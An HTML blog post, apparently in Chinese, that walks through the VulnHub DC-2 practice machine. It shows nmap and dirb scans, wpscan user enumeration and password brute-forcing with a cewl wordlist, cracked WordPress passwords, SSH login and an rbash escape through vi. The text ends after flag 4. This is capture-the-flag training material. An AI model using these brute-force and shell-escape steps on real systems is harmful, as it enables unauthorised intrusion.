<!DOCTYPE html>
<html lang="zh-CN">
    <!-- title -->


    

<!-- keywords -->



<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="author" content="xiabee">
    <meta name="renderer" content="webkit">
    <meta name="copyright" content="xiabee">
    
        <meta name="keywords" content="xiabee,hexo-theme,xiabee-blog">
    
    <meta name="description" content="">
    <meta name="description" content="写在前面：本站内容仅供技术交流分享，切勿非法使用，一切技术后果自行承担 上期回顾：VulnHub DC 1 通关纪实 DC 2 靶机下载地址：https:&#x2F;&#x2F;www.vulnhub.com&#x2F;entry&#x2F;dc-2,311&#x2F; 渗透主机：kali 2020  涉及渗透技术：   nmap 等扫描 本地域名解析  wpscan 扫描和攻击  cewl 针对性字典生成  git 提权  题目描述 搭建靶机和">
<meta property="og:type" content="article">
<meta property="og:title" content="VulnHub DC2 通关纪实">
<meta property="og:url" content="https://blog.xiabee.cn/posts/vulnhub-dc-2/index.html">
<meta property="og:site_name" content="xiabee-瞎哔哔">
<meta property="og:description" content="写在前面：本站内容仅供技术交流分享，切勿非法使用，一切技术后果自行承担 上期回顾：VulnHub DC 1 通关纪实 DC 2 靶机下载地址：https:&#x2F;&#x2F;www.vulnhub.com&#x2F;entry&#x2F;dc-2,311&#x2F; 渗透主机：kali 2020  涉及渗透技术：   nmap 等扫描 本地域名解析  wpscan 扫描和攻击  cewl 针对性字典生成  git 提权  题目描述 搭建靶机和">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://s3.xiabee.cn/pic/2023/03/2f6545c6de85fda56a2eea4e1cd227c76415a39ee68cda192653a4938140aec2.png">
<meta property="og:image" content="https://s3.xiabee.cn/pic/2023/03/01980b8bfd8355935fb10b8836f60bb1a17b58d55f2fe148c67626e5e4583586.png">
<meta property="og:image" content="https://s3.xiabee.cn/pic/2023/03/5e7bd70eff7cf212d9f9f3a7701779ce7e258e91447a15d11cc67c1c08a2443b.png">
<meta property="og:image" content="https://s3.xiabee.cn/pic/2023/03/f9953a5857e83d00144cbe20153d6e3b7ee182923597d362c45f75eba7018fbd.png">
<meta property="og:image" content="https://s3.xiabee.cn/pic/2023/03/7c1c69fcd593f0deef36ead8fabacf66083a64963214fbb17fcb9bcaedde85cf.png">
<meta property="og:image" content="https://s3.xiabee.cn/pic/2023/03/3f49cada812e3785f850c50e2b284a06147308b7929922425dca08fbf7dea47c.png">
<meta property="og:image" content="https://s3.xiabee.cn/pic/2023/03/c381b3e6d67bd9a5dbe1cd4bb4d85ee40e52af35b5280e562c87b189a035efb3.png">
<meta property="og:image" content="https://s3.xiabee.cn/pic/2023/03/8995b81e1197803abb795463e717b018be362a32a5a1116c62f324e8694561e4.png">
<meta property="og:image" content="https://s3.xiabee.cn/pic/2023/03/32363102ea470eb8af2aa748d1da9719a2cbe2002f42466b155a7a2f24bf9cbd.png">
<meta property="og:image" content="https://s3.xiabee.cn/pic/2023/03/17c1ad6c4b82e88b4bbfcf181e624e5f54def101b83d1665a418375595f13c55.png">
<meta property="og:image" content="https://s3.xiabee.cn/pic/2023/03/67c7781873b2c1c83839b9e793fe1bfad4121c4a93242111c7aea4153fa2723f.png">
<meta property="og:image" content="https://s3.xiabee.cn/pic/2023/03/70ca83486b79a1b216cb5edb02f35dc7c227781db33ee5af270a87c81a3066d3.png">
<meta property="og:image" content="https://s3.xiabee.cn/pic/2023/03/95c4a0a3bca25074b3c189d02aa8c49e212f864ea57ff8f358c692a894926c7a.png">
<meta property="og:image" content="https://s3.xiabee.cn/pic/2023/03/1c3bde36b1e30781340cca6470e5274c9eff767ec5a5aee3cd2fdf8cb102f408.png">
<meta property="og:image" content="https://s3.xiabee.cn/pic/2023/03/2e89eb08610181de15d2d052041c22016950b859a4c3554128b3b92fb8f93ae1.png">
<meta property="og:image" content="https://s3.xiabee.cn/pic/2023/03/409a05f22f311ad522812585c11605181ad9093e1fb91f8760c3aa1485f66024.png">
<meta property="og:image" content="https://s3.xiabee.cn/pic/2023/03/3766d41737b4a233c7506f8ee2ca965881f962c4bf9a3d9d88031b85f4acaccd.png">
<meta property="og:image" content="https://s3.xiabee.cn/pic/2023/03/19bed3818c69d1c21be0a175248af05506ee9848735d4a0d3cf9262ea8f08539.png">
<meta property="og:image" content="https://s3.xiabee.cn/pic/2023/03/cf278761d7f5824102336348c992ad02350dbab46d6571db15d0ea9534f02d60.png">
<meta property="og:image" content="https://s3.xiabee.cn/pic/2023/03/a8998ea642dd3555db8f165b1b2f98ada334a42ce956db7b8194fd2702188d14.png">
<meta property="og:image" content="https://s3.xiabee.cn/pic/2023/03/3e750eeb351de7a201c3b8e072b7485b264c77fa3d3d3aeea8d8edca53ba47ee.png">
<meta property="og:image" content="https://s3.xiabee.cn/pic/2023/03/3b33b3baa2a597b7033ed657979ccb7038a88fc6732b85a68e01c902769c659a.png">
<meta property="og:image" content="https://s3.xiabee.cn/pic/2023/03/6bedca61df3ad57c6144ad34762668154a7b9fa371536ff4414126c67bb8a964.png">
<meta property="og:image" content="https://s3.xiabee.cn/pic/2023/03/fb79b083e11d01bf5220ad6c03ea01f66b4a0724030bcd4d83c0bca2974a4bcd.png">
<meta property="og:image" content="https://s3.xiabee.cn/pic/2023/03/1cfc52ed386a17e7a59c48df793e3b6e9b17f878d15b8daab9c979bb8e9d1f7b.png">
<meta property="og:image" content="https://s3.xiabee.cn/pic/2023/03/cb0e08166d688b928b37bfef31c169ef799b4a9eb4d099aa0826d120ef92a197.png">
<meta property="og:image" content="https://s3.xiabee.cn/pic/2023/03/b159cc6b6ad57e4bb76e0c79f51c2431757815f4fe316281a413339defbb5acf.png">
<meta property="og:image" content="https://s3.xiabee.cn/pic/2023/03/14fa375cb0b3f79bfd7f8a2cfcfe43585e564d8ab2fdbb08d0ee4e5b90905b58.png">
<meta property="article:published_time" content="2020-03-09T13:00:23.000Z">
<meta property="article:modified_time" content="2023-03-21T08:03:14.916Z">
<meta property="article:author" content="xiabee">
<meta property="article:tag" content="vulnhub">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://s3.xiabee.cn/pic/2023/03/2f6545c6de85fda56a2eea4e1cd227c76415a39ee68cda192653a4938140aec2.png">
    <meta http-equiv="Cache-control" content="no-cache">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <link rel="icon" href="https://s3.xiabee.cn/pic/icons/favicon.jpg">
    
    <title>VulnHub DC2 通关纪实 · xiabee-瞎哔哔</title>
    <!-- /*! loadCSS. [c]2017 Filament Group, Inc. MIT License */
/* This file is meant as a standalone workflow for
- testing support for link[rel=preload]
- enabling async CSS loading in browsers that do not support rel=preload
- applying rel preload css once loaded, whether supported or not.
*/ -->
<script>
    (function (w) {
        'use strict'
        // rel=preload support test
        if (!w.loadCSS) {
            w.loadCSS = function () {}
        }
        // define on the loadCSS obj
        var rp = (loadCSS.relpreload = {})
        // rel=preload feature support test
        // runs once and returns a function for compat purposes
        rp.support = (function () {
            var ret
            try {
                ret = w.document.createElement('link').relList.supports('preload')
            } catch (e) {
                ret = false
            }
            return function () {
                return ret
            }
        })()

        // if preload isn't supported, get an asynchronous load by using a non-matching media attribute
        // then change that media back to its intended value on load
        rp.bindMediaToggle = function (link) {
            // remember existing media attr for ultimate state, or default to 'all'
            var finalMedia = link.media || 'all'

            function enableStylesheet() {
                link.media = finalMedia
            }

            // bind load handlers to enable media
            if (link.addEventListener) {
                link.addEventListener('load', enableStylesheet)
            } else if (link.attachEvent) {
                link.attachEvent('onload', enableStylesheet)
            }

            // Set rel and non-applicable media type to start an async request
            // note: timeout allows this to happen async to let rendering continue in IE
            setTimeout(function () {
                link.rel = 'stylesheet'
                link.media = 'only x'
            })
            // also enable media after 3 seconds,
            // which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
            setTimeout(enableStylesheet, 3000)
        }

        // loop through link elements in DOM
        rp.poly = function () {
            // double check this to prevent external calls from running
            if (rp.support()) {
                return
            }
            var links = w.document.getElementsByTagName('link')
            for (var i = 0; i < links.length; i++) {
                var link = links[i]
                // qualify links to those with rel=preload and as=style attrs
                if (
                    link.rel === 'preload' &&
                    link.getAttribute('as') === 'style' &&
                    !link.getAttribute('data-loadcss')
                ) {
                    // prevent rerunning on link
                    link.setAttribute('data-loadcss', true)
                    // bind listeners to toggle media back
                    rp.bindMediaToggle(link)
                }
            }
        }

        // if unsupported, run the polyfill
        if (!rp.support()) {
            // run once at least
            rp.poly()

            // rerun poly on an interval until onload
            var run = w.setInterval(rp.poly, 500)
            if (w.addEventListener) {
                w.addEventListener('load', function () {
                    rp.poly()
                    w.clearInterval(run)
                })
            } else if (w.attachEvent) {
                w.attachEvent('onload', function () {
                    rp.poly()
                    w.clearInterval(run)
                })
            }
        }

        // commonjs
        if (typeof exports !== 'undefined') {
            exports.loadCSS = loadCSS
        } else {
            w.loadCSS = loadCSS
        }
    })(typeof global !== 'undefined' ? global : this)
</script>

    <style type="text/css">
    @font-face {
        font-family: 'Oswald-Regular';
        src: url("/font/Oswald-Regular.ttf");
    }

    body {
        margin: 0;
    }

    header,
    footer,
    .back-top,
    .sidebar,
    .container,
    .site-intro-meta,
    .toc-wrapper {
        display: none;
    }

    .site-intro {
        position: relative;
        z-index: 3;
        width: 100%;
        /* height: 50vh; */
        overflow: hidden;
    }

    .site-intro-placeholder {
        position: absolute;
        z-index: -2;
        top: 0;
        left: 0;
        width: calc(100% + 300px);
        height: 100%;
        background: repeating-linear-gradient(-45deg, #444 0, #444 80px, #333 80px, #333 160px);
        background-position: center center;
        transform: translate3d(-226px, 0, 0);
        animation: gradient-move 2.5s ease-out 0s infinite;
    }

    @keyframes gradient-move {
        0% {
            transform: translate3d(-226px, 0, 0);
        }
        100% {
            transform: translate3d(0, 0, 0);
        }
    }
</style>

    <link rel="preload" href="/css/style.css?v=20210823" as="style" onload="this.onload=null;this.rel='stylesheet'">
    <link rel="preload" href="/css/dark.css?v=20210823" as="style">
    <link rel="stylesheet" href="/css/dark.css">
    <link rel="stylesheet" href="/css/mobile.css?v=20210823" media="(max-width: 960px)">
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" as="script">
    <link rel="preload" href="/scripts/main.js?v=20210823" as="script">
    <link rel="preload" href="/scripts/dark.js?v=20210823" as="script">
    <link rel="preload" href="/font/Oswald-Regular.ttf" as="font" crossorigin>
    <link rel="preload" href="https://at.alicdn.com/t/font_327081_1dta1rlogw17zaor.woff" as="font" crossorigin>
    <!-- algolia -->
    
        <script>
            var hits = JSON.parse('{"per_page":10}')
            var labels = JSON.parse('{"input_placeholder":"Search for Posts","hits_empty":"We did not find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}')

            var algolia = {
                applicationID: '2BK6PYKX0M',
                apiKey: 'a66bcd276348975224eb517894049525',
                indexName: 'xiabee-search',
                hits: hits,
                labels: labels
            }
        </script>
    
    <!-- 百度统计  -->
    
    <!-- 谷歌统计  -->
    
<meta name="generator" content="Hexo 5.4.2"></head>

    <script src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js"></script>
    <script type="text/javascript">
        if (typeof window.$ == undefined) {
            console.warn('jquery load from jsdelivr failed, will load local script')
            document.write('<script src="/lib/jquery.min.js" />')
        }
    </script>
    
        <body class="post-body">
    
        <!-- header -->
        <header class="header header-mobile">
    <!-- top read progress line -->
    <div class="header-element">
        <div class="read-progress"></div>
    </div>
    <!-- sidebar menu button -->
    <div class="header-element">
        
            <div class="header-sidebar-menu">
        
            
                <div style="padding-left: 1px;">&#xe775;</div>
            
        </div>
    </div>
    <!-- header actions -->
    <div class="header-actions">
        <!-- theme mode switch button -->
        <span class="header-theme-btn header-element">
            <i class="fas fa-adjust"></i>
        </span>
        <!-- back to home page text -->
        <span class="home-link header-element">
            <a href=/>XiaBee's Studio.</a>
        </span>
    </div>
    <!-- toggle banner for post layout -->
    
        
            <div class="banner">
        
            <div class="blog-title header-element">
                <a href="/">XiaBee&#39;s Studio.</a>
            </div>
            <div class="post-title header-element">
                <a href="#" class="post-name">VulnHub DC2 通关纪实</a>
            </div>
        </div>
    
</header>

        <!-- fixed footer -->
        <footer class="footer-fixed">
    <!-- back to top button -->
    <div class="footer-fixed-element">
        
            <div class="back-top back-top-hidden">
        
        
            <div>&#xe639;</div>
        
        </div>
    </div>
</footer>

        <!-- wrapper -->
        <div class="wrapper">
            <div class="site-intro" style="







    height:50vh;

">
    
    <!-- 主页  -->
    
        
    <!-- 404页  -->
            
    <div class="site-intro-placeholder"></div>
    <div class="site-intro-img" style="background-image: url(https://s3.xiabee.cn/pic/wallpaper/22.jpg)"></div>
    <div class="site-intro-meta">
        <!-- 标题  -->
        <h1 class="intro-title">
            <!-- 主页  -->
            
                VulnHub DC2 通关纪实
            <!-- 404 -->
            
        </h1>
        <!-- 副标题 -->
        <p class="intro-subtitle">
            <!-- 主页副标题  -->
            
                
            <!-- 404 -->
            
        </p>
        <!-- 文章页 meta -->
        
            <div class="post-intros">
                <!-- 文章页标签  -->
                
                    <div class= post-intro-tags >
    
    
        <a class="post-tag" href="javascript:void(0);" data-tags="vulnhub">vulnhub</a>
    
</div>

                
                
                    <div class="post-intro-read">
                        <span>字数统计: <span class="post-count word-count">1.5k</span>阅读时长: <span class="post-count reading-time">6 min</span></span>
                    </div>
                
                <div class="post-intro-meta">
                    <!-- 撰写日期 -->
                    <span class="iconfont-archer post-intro-calander">&#xe676;</span>
                    <span class="post-intro-time">2020/03/09</span>
                    <!-- busuanzi -->
                    
                        <span id="busuanzi_container_page_pv" class="busuanzi-pv">
                            <span class="iconfont-archer post-intro-busuanzi">&#xe602;</span>
                            <span id="busuanzi_value_page_pv"></span>
                        </span>
                    
                    <!-- 文章分享 -->
                    <span class="share-wrapper">
                        <span class="iconfont-archer share-icon">&#xe71d;</span>
                        <span class="share-text">Share</span>
                        <ul class="share-list">
                            <li class="iconfont-archer share-qr" data-type="qr">&#xe75b;
                                <div class="share-qrcode"></div>
                            </li>
                            <li class="iconfont-archer" data-type="weibo">&#xe619;</li>
                            <li class="iconfont-archer" data-type="qzone">&#xe62e;</li>
                            <li class="iconfont-archer" data-type="twitter">&#xe634;</li>
                            <li class="iconfont-archer" data-type="facebook">&#xe67a;</li>
                        </ul>
                    </span>
                </div>
            </div>
        
    </div>
</div>

            <script>
  // get user agent
  function getBrowserVersions() {
    var u = window.navigator.userAgent
    return {
      userAgent: u,
      trident: u.indexOf('Trident') > -1, //IE内核
      presto: u.indexOf('Presto') > -1, //opera内核
      webKit: u.indexOf('AppleWebKit') > -1, //苹果、谷歌内核
      gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1, //火狐内核
      mobile: !!u.match(/AppleWebKit.*Mobile.*/), //是否为移动终端
      ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios终端
      android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, //android终端或者uc浏览器
      iPhone: u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1, //是否为iPhone或者安卓QQ浏览器
      iPad: u.indexOf('iPad') > -1, //是否为iPad
      webApp: u.indexOf('Safari') == -1, //是否为web应用程序，没有头部与底部
      weixin: u.indexOf('MicroMessenger') == -1, //是否为微信浏览器
      uc: u.indexOf('UCBrowser') > -1, //是否为android下的UC浏览器
    }
  }
  var browser = {
    versions: getBrowserVersions(),
  }
  console.log('userAgent: ' + browser.versions.userAgent)

  // callback
  function fontLoaded() {
    console.log('font loaded')
    if (document.getElementsByClassName('site-intro-meta')) {
      document
        .getElementsByClassName('intro-title')[0]
        .classList.add('intro-fade-in')
      document
        .getElementsByClassName('intro-subtitle')[0]
        .classList.add('intro-fade-in')
      var postIntros = document.getElementsByClassName('post-intros')[0]
      if (postIntros) {
        postIntros.classList.add('post-fade-in')
      }
    }
  }

  // UC不支持跨域，所以直接显示
  function asyncCb() {
    if (browser.versions.uc) {
      console.log('UCBrowser')
      fontLoaded()
    } else {
      WebFont.load({
        custom: {
          families: ['Oswald-Regular'],
        },
        loading: function () {
          // 所有字体开始加载
          // console.log('font loading');
        },
        active: function () {
          // 所有字体已渲染
          fontLoaded()
        },
        inactive: function () {
          // 字体预加载失败，无效字体或浏览器不支持加载
          console.log('inactive: timeout')
          fontLoaded()
        },
        timeout: 5000, // Set the timeout to two seconds
      })
    }
  }

  function asyncErr() {
    console.warn('script load from CDN failed, will load local script')
  }

  // load webfont-loader async, and add callback function
  function async(u, cb, err) {
    var d = document,
      t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0]
    o.src = u
    if (cb) {
      o.addEventListener(
        'load',
        function (e) {
          cb(null, e)
        },
        false
      )
    }
    if (err) {
      o.addEventListener(
        'error',
        function (e) {
          err(null, e)
        },
        false
      )
    }
    s.parentNode.insertBefore(o, s)
  }

  var asyncLoadWithFallBack = function (arr, success, reject) {
    var currReject = function () {
      reject()
      arr.shift()
      if (arr.length) async(arr[0], success, currReject)
    }

    async(arr[0], success, currReject)
  }

  asyncLoadWithFallBack(
    [
      'https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js',
      'https://cdn.bootcss.com/webfont/1.6.28/webfontloader.js',
      "/lib/webfontloader.min.js",
    ],
    asyncCb,
    asyncErr
  )
</script>

            <img class="loading" src="/assets/loading.svg" style="display: block; margin: 6rem auto 0 auto; width: 6rem; height: 6rem;" />
            <div class="container container-unloaded">
                <main class="main post-page">
    <article class="article-entry">
        <p>写在前面：本站内容仅供技术交流分享，切勿非法使用，一切技术后果自行承担</p>
<p>上期回顾：<a href="https://blog.xiabee.cn/posts/vulnhub-dc-1/">VulnHub DC 1 通关纪实</a></p>
<p>DC 2 靶机下载地址：<a target="_blank" rel="noopener" href="https://www.vulnhub.com/entry/dc-2,311/">https://www.vulnhub.com/entry/dc-2,311/</a></p>
<p>渗透主机：kali 2020 </p>
<p>涉及渗透技术： </p>
<ul>
<li>nmap 等扫描</li>
<li>本地域名解析 </li>
<li>wpscan 扫描和攻击 </li>
<li>cewl 针对性字典生成 </li>
<li>git 提权</li>
</ul>
<h2 id="题目描述"><a href="#题目描述" class="headerlink" title="题目描述"></a>题目描述</h2><p><img src="https://s3.xiabee.cn/pic/2023/03/2f6545c6de85fda56a2eea4e1cd227c76415a39ee68cda192653a4938140aec2.png" alt="image-20230321154210123"></p>
<h2 id="搭建靶机"><a href="#搭建靶机" class="headerlink" title="搭建靶机"></a>搭建靶机</h2><p>和 <a href="https://blog.xiabee.cn/posts/vulnhub-dc-1/">DC1</a> 一样，这里我们直接搭建在 VM 里面，保障靶机和渗透主机在同一网段即可，这里我们网络模式选择 NAT 模式，即共享IP地址</p>
<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><p>渗透主机地址：<strong>192.168.80.128</strong></p>
<p><img src="https://s3.xiabee.cn/pic/2023/03/01980b8bfd8355935fb10b8836f60bb1a17b58d55f2fe148c67626e5e4583586.png" alt="image-20230321154353148"></p>
<p>靶机地址：<strong>192.168.80.131</strong></p>
<p><img src="https://s3.xiabee.cn/pic/2023/03/5e7bd70eff7cf212d9f9f3a7701779ce7e258e91447a15d11cc67c1c08a2443b.png" alt="image-20230321154404028"></p>
<p>发现 ip，直接 nmap 一顿梭：<code>nmap -A -p- -T4 192.168.80.131</code></p>
<p><img src="https://s3.xiabee.cn/pic/2023/03/f9953a5857e83d00144cbe20153d6e3b7ee182923597d362c45f75eba7018fbd.png" alt="image-20230321154438952"></p>
<p>发现开放了 80 端口和 7744 端口 然后康康他的网站目录，dirb 一顿梭：<code>dirb http://192.168.80.131</code></p>
<p><img src="https://s3.xiabee.cn/pic/2023/03/7c1c69fcd593f0deef36ead8fabacf66083a64963214fbb17fcb9bcaedde85cf.png" alt="image-20230321154640381"></p>
<p>dirb 爆破目录 看到熟悉的 “wp-admin”，基本可以确定是个  wordpress 的网站了 直接浏览器访问一下试试：</p>
<p><img src="https://s3.xiabee.cn/pic/2023/03/3f49cada812e3785f850c50e2b284a06147308b7929922425dca08fbf7dea47c.png" alt="image-20230321154705662"></p>
<p>emmmm 靶机做了重定向，直接跳转到了<a target="_blank" rel="noopener" href="http://dc-2,而且还没做域名解析/">http://dc-2，而且还没做域名解析</a>…… </p>
<p>我们整理一下信息： </p>
<ul>
<li>靶机开放了80端口 </li>
<li>80端口重定向到了 <a target="_blank" rel="noopener" href="http://dc-2/">http://dc-2</a> </li>
<li>靶机CMS框架为 wordpress </li>
<li>靶机开放了ssh端口</li>
</ul>
<h2 id="修改域名解析"><a href="#修改域名解析" class="headerlink" title="修改域名解析"></a>修改域名解析</h2><p>既然靶机没有做域名解析，那就在主机本地做一次域名解析嘛</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">sudo <span class="built_in">chmod</span> 777 /etc/hosts</span><br><span class="line"><span class="comment"># 修改权限，保证非root也可写可执行</span></span><br><span class="line">vi /etc/hosts</span><br><span class="line"><span class="comment"># 进入vim修改hosts文件</span></span><br></pre></td></tr></table></figure>

<p>手动添加 dc-2 的解析，保存并退出：</p>
<p><img src="https://s3.xiabee.cn/pic/2023/03/c381b3e6d67bd9a5dbe1cd4bb4d85ee40e52af35b5280e562c87b189a035efb3.png" alt="image-20230321154808330"></p>
<p>修改hosts文件 </p>
<p>然后再次浏览器访问 <a href="http://dc-2：">http://dc-2：</a></p>
<p><img src="https://s3.xiabee.cn/pic/2023/03/8995b81e1197803abb795463e717b018be362a32a5a1116c62f324e8694561e4.png" alt="image-20230321154827502"></p>
<p>此时看到了经典的WP主题</p>
<h2 id="寻找-FLAG"><a href="#寻找-FLAG" class="headerlink" title="寻找 FLAG"></a>寻找 FLAG</h2><h3 id="FLAG1"><a href="#FLAG1" class="headerlink" title="FLAG1"></a>FLAG1</h3><p>首页好大一个 <strong>Flag</strong> 按钮，直接点进去康康：<img src="https://s3.xiabee.cn/pic/2023/03/32363102ea470eb8af2aa748d1da9719a2cbe2002f42466b155a7a2f24bf9cbd.png" alt="image-20230321154914261"></p>
<blockquote>
<p>Flag 1: Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl. More passwords is always better, but sometimes you just can’t win them all. Log in as one to see the next flag. If you can’t find it, log in as another. </p>
<p>flag1提示</p>
</blockquote>
<p>flag1暗示我们，常用字典可能不管用了，也许需要cewl一下</p>
<h3 id="FLAG2"><a href="#FLAG2" class="headerlink" title="FLAG2"></a>FLAG2</h3><p>话不多说，直接上 wpscan 开始跑</p>
<p> <del>为什么不像 DC1 那样直接跑一顿 msf：试过了，只靠现有的payload好像打不下来……</del></p>
<p>那我们就先康康网站有哪些用户：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">wpscan --url http://dc-2 -e u</span><br><span class="line"><span class="comment">#扫描wordpress中的发表过文章的用户</span></span><br></pre></td></tr></table></figure>

<p><img src="https://s3.xiabee.cn/pic/2023/03/17c1ad6c4b82e88b4bbfcf181e624e5f54def101b83d1665a418375595f13c55.png" alt="image-20230321155026756"></p>
<p>枚举用户名 扫描发现三个用户，分别为：admin, jerry, tom </p>
<p>利用刚刚扫描得到的用户信息，通过 cewl 生成密码字典：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cewl http://dc-2 -w pass</span><br><span class="line"><span class="comment"># 针对 dc-2 这个网站生成字典，并保存在pass文件中</span></span><br></pre></td></tr></table></figure>

<p>再创建一个 user 文件，保存刚刚扫出来的三个用户名</p>
<p><img src="https://s3.xiabee.cn/pic/2023/03/67c7781873b2c1c83839b9e793fe1bfad4121c4a93242111c7aea4153fa2723f.png" alt="image-20230321155119519"></p>
<p><img src="https://s3.xiabee.cn/pic/2023/03/70ca83486b79a1b216cb5edb02f35dc7c227781db33ee5af270a87c81a3066d3.png" alt="image-20230321155127245"></p>
<p>pass和user的文件内容</p>
<p>wpscan 爆破用户密码：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">wpscan --url http://dc-2 -U user -P pass</span><br><span class="line"><span class="comment"># 对dc-2进行爆破，使用的字典为刚刚写的 user 和 pass</span></span><br></pre></td></tr></table></figure>

<p>直接爆破，发现靶机没做防火墙，那莽就完事了……<del>（我用同样的办法爆破我自己的博客，然后被防火墙封了四个小时www）</del></p>
<p><img src="https://s3.xiabee.cn/pic/2023/03/95c4a0a3bca25074b3c189d02aa8c49e212f864ea57ff8f358c692a894926c7a.png" alt="image-20230321155203943"></p>
<p>爆破结果 此时看到，admin 的密码不在字典里面，但是 tom and jerry 都被爆出来了</p>
<ul>
<li>Username: jerry, Password: adipiscing</li>
<li>Username: tom, Password: parturient</li>
</ul>
<p>随便挑一个登陆后台，我们在 Pages 里面看到坨大一个 Flag2：</p>
<p><img src="https://s3.xiabee.cn/pic/2023/03/1c3bde36b1e30781340cca6470e5274c9eff767ec5a5aee3cd2fdf8cb102f408.png" alt="image-20230321155258856"></p>
<p>Flag2</p>
<p>点进去康康：</p>
<p><img src="https://s3.xiabee.cn/pic/2023/03/2e89eb08610181de15d2d052041c22016950b859a4c3554128b3b92fb8f93ae1.png" alt="image-20230321155311953"></p>
<blockquote>
<p>Flag 2: If you can’t exploit WordPress and take a shortcut, there is another way. Hope you found another entry point. </p>
<p>flag2提示</p>
</blockquote>
<p>意思就是直接爆破Wordpress是没用的，你得找别的方法进去……（和我们前期msf尝试的结果一样一样的</p>
<h3 id="FLAG3"><a href="#FLAG3" class="headerlink" title="FLAG3"></a>FLAG3</h3><p>直接用刚刚爆出来的两个账号 ssh 登录一下试试：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ssh tom@192.168.80.131 -p 7744</span><br><span class="line"><span class="comment"># 这里加个 -p 是因为靶机的ssh不是常用端口，需要指定一下</span></span><br></pre></td></tr></table></figure>

<p>然后直接用刚刚爆破出来的密码”parturient”登陆进去：</p>
<p><img src="https://s3.xiabee.cn/pic/2023/03/409a05f22f311ad522812585c11605181ad9093e1fb91f8760c3aa1485f66024.png" alt="image-20230321155506493"></p>
<p>tom 登陆成功 然后四处逛逛，发现他有 flag3，但是你看不了，因为你是 rbash……</p>
<img src="https://s3.xiabee.cn/pic/2023/03/3766d41737b4a233c7506f8ee2ca965881f962c4bf9a3d9d88031b85f4acaccd.png" alt="image-20230321155526148" style="zoom:150%;" />

<p>rbash</p>
<p>那先查看一下环境变量：<code>echo $PATH$</code></p>
<img src="https://s3.xiabee.cn/pic/2023/03/19bed3818c69d1c21be0a175248af05506ee9848735d4a0d3cf9262ea8f08539.png" alt="image-20230321155600035" style="zoom:150%;" />



<p>还有救，我们尝试用vi转义一下shell，拿一个权限比较高的 bash shell出来</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">vi</span><br><span class="line">:<span class="built_in">set</span> shell=/bin/bash</span><br><span class="line">:shell</span><br><span class="line"><span class="comment"># 这里利用的是vim命令模式，通过vim命令来设置shell转义</span></span><br></pre></td></tr></table></figure>

<img src="https://s3.xiabee.cn/pic/2023/03/cf278761d7f5824102336348c992ad02350dbab46d6571db15d0ea9534f02d60.png" alt="image-20230321155632261" style="zoom:200%;" />

<p>然后设置环境变量：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">export</span> PATH=/bin:/usr/bin:<span class="variable">$PATH</span></span><br><span class="line"><span class="built_in">export</span> SHELL=/bin/bash:<span class="variable">$SHELL</span></span><br><span class="line"><span class="comment"># 把刚刚设置好的shell导入环境变量中</span></span><br></pre></td></tr></table></figure>

<img src="https://s3.xiabee.cn/pic/2023/03/a8998ea642dd3555db8f165b1b2f98ada334a42ce956db7b8194fd2702188d14.png" alt="image-20230321155711221" style="zoom:200%;" />

<p>此时的PATH已经变了</p>
<p>然后尝试cat一下，可以了：</p>
<p><img src="https://s3.xiabee.cn/pic/2023/03/3e750eeb351de7a201c3b8e072b7485b264c77fa3d3d3aeea8d8edca53ba47ee.png" alt="image-20230321155732923"></p>
<blockquote>
<p>Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes. </p>
<p>flag3提示</p>
</blockquote>
<h3 id="FLAG4"><a href="#FLAG4" class="headerlink" title="FLAG4"></a>FLAG4</h3><p>flag3 暗示我们切换到 jerry 的用户去（Jerry的密码是adipiscing）</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">su jerry</span><br><span class="line"><span class="built_in">cd</span> /home/jerry</span><br><span class="line"><span class="built_in">ls</span></span><br><span class="line"><span class="built_in">cat</span> flag4.txt</span><br><span class="line"><span class="comment"># 进去直接看到了flag4...</span></span><br></pre></td></tr></table></figure>

<p><img src="https://s3.xiabee.cn/pic/2023/03/3b33b3baa2a597b7033ed657979ccb7038a88fc6732b85a68e01c902769c659a.png" alt="image-20230321155847034"></p>
<blockquote>
